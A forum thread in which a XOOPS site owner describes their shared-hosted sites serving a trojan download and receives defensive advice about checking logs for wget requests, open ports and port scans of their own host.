Okay, this creeped me out. I need to talk to somebody.

I have 7 XOOPS sites (2.0.13.1 - 2.2.4) hosted on a RoundBerry resellers account. Late yesterday afternoon, loading any page on any of these sites also started a download of the xpl.wmf trojan. Other than trying to infect my pc, the sites behaved themselves. Phplist (outside of XOOPS) did the same thing.

I contacted the admins and they said it was caused by a "dynamic module loading without apache". They removed this 'module' and all is well. Except for my wits. I'm not an apache wizard, but the admin's explanation is not comforting. I asked again and got the same answer.

Anyone know if there's a mod_spyware for apache?

Maybe this is not the case - but most hardware providers won't tell you the full truth...that being said, maybe your's is being pretty forthright.

More than likely, if your reseller account is on a shared system with other resellers, then there are probably a number of ports open that don't need to be OR should not be. Two groups have been very active lately in exploiting the open ports and submitting trojens - one out of France and one out of S. Africa. If you are really interested in what's going on, try logging in and seeing if you have authority to retrieve all ports and processes running. You might be surprised at what is really open.

The other thing to look for, go into each of your sites logs. You specifically want to find any "wget" strings that are being issued against your site. They are looking for overflows to occur. Okay - this statement is not meant to get anyone all balled up - but hosting companies love to blame CMS's for being so insecure that's how people hack in. IF, and this is a big IF, they were able to get in through an overflow and issue wget commands - then just identify the site, notify your provider, and get the holes plugged up.

Good Luck!

Quote:

I've been with RoundBerry for almost a year, and they're tech support has, overall, been very good. I just get the feeling they're taking a CYA position.

Since I don't have telnet access to my account, I'll see what I can dig up in the logs. I appreciate your input. Thanks!

Sorry - what I meant was, they won't tell you because they are doing a CYA...!

If they give too many details, it could be used to exploit them if it gets out.

I'm surprised you don't have some type of telnet (bad) or SSH (good). Is it a windows platform? Linux?

Good luck!

Quote:

You can also try a portscan. There are several free tools and even websites offering to portscan a ip address.
Then you get an idea of possible attack sources.
Just google portscan + tcp ip ports to find websites to check what the heck these ports are good for (or even bad ).

Marco

It's a Linux host, and yes, they do advertise telnet/ssh access, but they've ignored two requests to grant access. I haven't pressed the issue. Sorry, I don't recall the error received the last time I tried to ssh in. (I'm at work and don't wanna try it from here.)

Right now, I'm inclined to trust that the admins are on top of things, though I might try a port scan. (Thanks, Marco!)

XOOPS... I'm lovin' it! And the spirit of the XOOPS community is great, too. Thanks for your help!

Blue's port scanner (google it!) is great, though AVG antivirus picks it up as a hacking tool.... You could argue that I s'pose

Follow up: the ssh port is open on my host, but ssh is disabled: "Shell access is not enabled on your account!" I'll drop it so I don't cause my isp undo heartburn.

I used Mac's Network Utility to portscan my host, but only found a minimal set of the usual suspects. Nothing that looks dangerous.

Again, thanks for the advice.